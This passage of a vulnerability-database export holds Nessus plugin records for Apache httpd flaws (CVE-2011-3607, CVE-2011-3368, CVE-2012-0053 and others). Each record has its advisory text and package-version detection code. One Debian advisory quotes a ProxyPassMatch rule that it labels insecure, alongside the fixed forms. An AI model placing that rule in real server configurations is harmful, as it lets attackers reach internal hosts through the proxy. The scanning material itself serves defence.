(rpm_check(release:\"ALA\", reference:\"httpd-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.22-1.23.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.22-1.23.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:13:06", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been found in the Apache HTTPD Server :\n\n - CVE-2011-3607 :\n An integer overflow in ap_pregsub() could allow local\n attackers to execute arbitrary code at elevated\n privileges via crafted .htaccess files.\n\n - CVE-2011-3368 CVE-2011-3639 CVE-2011-4317 :\n The Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain reverse\n proxy configurations using the ProxyPassMatch directive\n or using the RewriteRule directive with the [P] flag, a\n remote attacker could make the proxy connect to an\n arbitrary server. This could allow the attacker to\n access internal servers that are not otherwise\n accessible from the outside.\n\n The three CVE ids denote slightly different variants of the same\n issue.\n\n Note that, even with this issue fixed, it is the responsibility of\n the administrator to ensure that the regular expression replacement\n pattern for the target URI does not allow a client to append\n arbitrary strings to the host or port parts of the target URI. For\n example, the configuration\n\n ProxyPassMatch ^/mail(.*) http://internal-host$1\n\n is still insecure and should be replaced by one of the following\n configurations :\n\n ProxyPassMatch ^/mail(/.*) http://internal-host$1 ProxyPassMatch\n ^/mail/(.*) http://internal-host/$1\n\n - CVE-2012-0031 :\n An apache2 child process could cause the parent process\n to crash during shutdown. This is a violation of the\n privilege separation between the apache2 processes and\n could potentially be used to worsen the impact of other\n vulnerabilities.\n\n - CVE-2012-0053 :\n The response message for error code 400 (bad request)\n could be used to expose 'httpOnly' cookies. This could\n allow a remote attacker using cross site scripting to\n steal authentication cookies.", "modified": "2018-11-28T00:00:00", "published": "2012-02-07T00:00:00", "id": "DEBIAN_DSA-2405.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57851", "title": "Debian DSA-2405-1 : apache2 - multiple issues", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2405. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57851);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/11/28 22:47:42\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49957, 50494, 50802, 51407, 51706);\n script_xref(name:\"DSA\", value:\"2405\");\n\n script_name(english:\"Debian DSA-2405-1 : apache2 - multiple issues\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been found in the Apache HTTPD Server :\n\n - CVE-2011-3607 :\n An integer overflow in ap_pregsub() could allow local\n attackers to execute arbitrary code at elevated\n privileges via crafted .htaccess files.\n\n - CVE-2011-3368 CVE-2011-3639 CVE-2011-4317 :\n The Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain reverse\n proxy configurations using the ProxyPassMatch directive\n or using the RewriteRule directive with the [P] flag, a\n remote attacker could make the proxy connect to an\n arbitrary server. This could allow the attacker to\n access internal servers that are not otherwise\n accessible from the outside.\n\n The three CVE ids denote slightly different variants of the same\n issue.\n\n Note that, even with this issue fixed, it is the responsibility of\n the administrator to ensure that the regular expression replacement\n pattern for the target URI does not allow a client to append\n arbitrary strings to the host or port parts of the target URI. For\n example, the configuration\n\n ProxyPassMatch ^/mail(.*) http://internal-host$1\n\n is still insecure and should be replaced by one of the following\n configurations :\n\n ProxyPassMatch ^/mail(/.*) http://internal-host$1 ProxyPassMatch\n ^/mail/(.*) http://internal-host/$1\n\n - CVE-2012-0031 :\n An apache2 child process could cause the parent process\n to crash during shutdown. This is a violation of the\n privilege separation between the apache2 processes and\n could potentially be used to worsen the impact of other\n vulnerabilities.\n\n - CVE-2012-0053 :\n The response message for error code 400 (bad request)\n could be used to expose 'httpOnly' cookies. This could\n allow a remote attacker using cross site scripting to\n steal authentication cookies.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3368\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/apache2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2405\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache2 packages.\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version apache2 2.2.16-6+squeeze6\n\nThis update also contains updated apache2-mpm-itk packages which have\nbeen recompiled against the updated apache2 packages. The new version\nnumber for the oldstable distribution is 2.2.6-02-1+lenny7. In the\nstable distribution, apache2-mpm-itk has the same version number as\napache2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"apache2\", reference:\"2.2.9-10+lenny12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-dbg\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-doc\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-event\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-itk\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-prefork\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-mpm-worker\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-prefork-dev\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-suexec\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-suexec-custom\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-threaded-dev\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2-utils\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2.2-bin\", reference:\"2.2.16-6+squeeze6\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"apache2.2-common\", reference:\"2.2.16-6+squeeze6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T20:13:11", "bulletinFamily": "scanner", "description": "It was discovered that the Apache HTTP Server incorrectly handled the\nSetEnvIf .htaccess file directive. An attacker having write access to\na .htaccess file may exploit this to possibly execute arbitrary code.\n(CVE-2011-3607)\n\nPrutha Parikh discovered that the mod_proxy module did not properly\ninteract with the RewriteRule and ProxyPassMatch pattern matches in\nthe configuration of a reverse proxy. This could allow remote\nattackers to contact internal webservers behind the proxy that were\nnot intended for external exposure. (CVE-2011-4317)\n\nRainer Canavan discovered that the mod_log_config module incorrectly\nhandled a certain format string when used with a threaded MPM. A\nremote attacker could exploit this to cause a denial of service via a\nspecially- crafted cookie. This issue only affected Ubuntu 11.04 and\n11.10. (CVE-2012-0021)\n\nIt was discovered that the Apache HTTP Server incorrectly handled\ncertain type fields within a scoreboard shared memory segment. A local\nattacker could exploit this to to cause a denial of service.\n(CVE-2012-0031)\n\nNorman Hippert discovered that the Apache HTTP Server incorrecly\nhandled header information when returning a Bad Request (400) error\npage. A remote attacker could exploit this to obtain the values of\ncertain HTTPOnly cookies. (CVE-2012-0053).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2018-12-01T00:00:00", "published": "2012-02-17T00:00:00", "id": "UBUNTU_USN-1368-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57999", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 10.10 / 11.04 / 11.10 : apache2 vulnerabilities (USN-1368-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1368-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57999);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/12/01 13:19:06\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 50802, 51407, 51705, 51706);\n script_xref(name:\"USN\", value:\"1368-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 10.10 / 11.04 / 11.10 : apache2 vulnerabilities (USN-1368-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the Apache HTTP Server incorrectly handled the\nSetEnvIf .htaccess file directive. An attacker having write access to\na .htaccess file may exploit this to possibly execute arbitrary code.\n(CVE-2011-3607)\n\nPrutha Parikh discovered that the mod_proxy module did not properly\ninteract with the RewriteRule and ProxyPassMatch pattern matches in\nthe configuration of a reverse proxy. This could allow remote\nattackers to contact internal webservers behind the proxy that were\nnot intended for external exposure. (CVE-2011-4317)\n\nRainer Canavan discovered that the mod_log_config module incorrectly\nhandled a certain format string when used with a threaded MPM. A\nremote attacker could exploit this to cause a denial of service via a\nspecially- crafted cookie. This issue only affected Ubuntu 11.04 and\n11.10. (CVE-2012-0021)\n\nIt was discovered that the Apache HTTP Server incorrectly handled\ncertain type fields within a scoreboard shared memory segment. A local\nattacker could exploit this to to cause a denial of service.\n(CVE-2012-0031)\n\nNorman Hippert discovered that the Apache HTTP Server incorrecly\nhandled header information when returning a Bad Request (400) error\npage. A remote attacker could exploit this to obtain the values of\ncertain HTTPOnly cookies. (CVE-2012-0053).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1368-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2.2-common package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2.2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"apache2.2-common\", pkgver:\"2.2.8-1ubuntu0.23\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"apache2.2-common\", pkgver:\"2.2.14-5ubuntu8.8\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"apache2.2-common\", pkgver:\"2.2.16-1ubuntu3.5\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"apache2.2-common\", pkgver:\"2.2.17-1ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"apache2.2-common\", pkgver:\"2.2.20-1ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2.2-common\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:18:34", "bulletinFamily": "scanner", "description": "- httpd-2.2.x-bnc743743-CVE-2012-0053-server_protocol_c-cookie_exposure.diff\naddresses CVE-2012-0053: error responses can expose cookies when\nno custom 400 error code ErrorDocument is configured. [bnc#743743]\n\n- httpd-2.2.x-bnc741243-CVE-2012-0031-scoreboard_handling.diff:\nscoreboard corruption\n (shared mem segment) by child causes\ncrash of privileged parent (invalid free()) during shutdown.\nThis is rated low impact. Notice:\nhttps://svn.apache.org/viewvc?view=revision&revision=1230065\nmakes a change to the struct global_score, which causes binary\nincompatibility. The change in above patch only goes as far as\nthe binary compatibility allows; the vulnerability is completely\nfixed, though. CVE-2012-0031 [bnc#741243]\n\n - /etc/init.d/apache2: new argument 'check-reload'. Exits\n 1 if httpd2 runs on deleted binaries such as after\n package update, else 0. This is used by equally modified\n /etc/logrotate.d/apache2, which uses\n '/etc/init.d/apache2 check-reload' in its prerotate\n script. These changes prevent httpd2 from being\n (gracefully) reloaded by logrotate, executed by cron, if\n new binaries have been installed. Instead, a warning is\n printed on stdout and is being logged to the syslogs. If\n this happens, apache's logs are NOT rotated, and the\n running processes are left untouched. This limits the\n maximum damage of log rotation to unrotated logs.\n '/etc/init.d/apache2 restart' (or 'rcapache2 restart')\n must be executed manually in such a case. [bnc#728876]\n\n- httpd-2.2.x-bnc729181-CVE-2011-3607-int_overflow.diff: Fix for\ninteger overflow in server/util.c also known as CVE-2011-3607.\n[bnc#729181]\n\n - enable build and configuration of mod_reqtimeout.c\n module by default in /etc/sysconfig/apache2\n (APACHE_MODULES=...). This does not change already\n existing sysconfig files, the module is only activated\n via sysconfig if this package is installed without\n pre-existing sysconfig file. See new file\n /etc/apache2/mod_reqtimeout.conf for configurables.\n Helps against Slowloris.pl DoS vulnerability that\n consists of eating up request slots by very slowly\n submitting the request. Note that mod_reqtimeout limits\n requests based on a lower boundary of request speed, not\n an upper boundary! CVE-2007-6750 [bnc#738855].", "modified": "2016-05-16T00:00:00", "published": "2014-06-13T00:00:00", "id": "OPENSUSE-2012-132.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=74555", "title": "openSUSE Security Update : apache2 (openSUSE-2012-132)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-132.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74555);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2016/05/16 16:21:30 $\");\n\n script_cve_id(\"CVE-2007-6750\", \"CVE-2011-3607\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-2012-132)\");\n script_summary(english:\"Check for the openSUSE-2012-132 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"- httpd-2.2.x-bnc743743-CVE-2012-0053-server_protocol_c-cookie_exposure.diff\naddresses CVE-2012-0053: error responses can expose cookies when\nno custom 400 error code ErrorDocument is configured. [bnc#743743]\n\n- httpd-2.2.x-bnc741243-CVE-2012-0031-scoreboard_handling.diff:\nscoreboard corruption\n (shared mem segment) by child causes\ncrash of privileged parent (invalid free()) during shutdown.\nThis is rated low impact. Notice:\nhttps://svn.apache.org/viewvc?view=revision&revision=1230065\nmakes a change to the struct global_score, which causes binary\nincompatibility. The change in above patch only goes as far as\nthe binary compatibility allows; the vulnerability is completely\nfixed, though. CVE-2012-0031 [bnc#741243]\n\n - /etc/init.d/apache2: new argument 'check-reload'. Exits\n 1 if httpd2 runs on deleted binaries such as after\n package update, else 0. This is used by equally modified\n /etc/logrotate.d/apache2, which uses\n '/etc/init.d/apache2 check-reload' in its prerotate\n script. These changes prevent httpd2 from being\n (gracefully) reloaded by logrotate, executed by cron, if\n new binaries have been installed. Instead, a warning is\n printed on stdout and is being logged to the syslogs. If\n this happens, apache's logs are NOT rotated, and the\n running processes are left untouched. This limits the\n maximum damage of log rotation to unrotated logs.\n '/etc/init.d/apache2 restart' (or 'rcapache2 restart')\n must be executed manually in such a case. [bnc#728876]\n\n- httpd-2.2.x-bnc729181-CVE-2011-3607-int_overflow.diff: Fix for\ninteger overflow in server/util.c also known as CVE-2011-3607.\n[bnc#729181]\n\n - enable build and configuration of mod_reqtimeout.c\n module by default in /etc/sysconfig/apache2\n (APACHE_MODULES=...). This does not change already\n existing sysconfig files, the module is only activated\n via sysconfig if this package is installed without\n pre-existing sysconfig file. See new file\n /etc/apache2/mod_reqtimeout.conf for configurables.\n Helps against Slowloris.pl DoS vulnerability that\n consists of eating up request slots by very slowly\n submitting the request. Note that mod_reqtimeout limits\n requests based on a lower boundary of request speed, not\n an upper boundary! CVE-2007-6750 [bnc#738855].\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=728876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=729181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=738855\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=741243\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=743743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://svn.apache.org/viewvc?view=revision&revision=1230065\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-event-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-debuginfo-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-debugsource-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-devel-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-event-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-event-debuginfo-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-example-pages-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-itk-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-itk-debuginfo-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-prefork-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-prefork-debuginfo-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-utils-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-utils-debuginfo-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-worker-2.2.21-3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-worker-debuginfo-2.2.21-3.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-debuginfo / apache2-debugsource / apache2-devel / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T17:42:28", "bulletinFamily": "unix", "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix 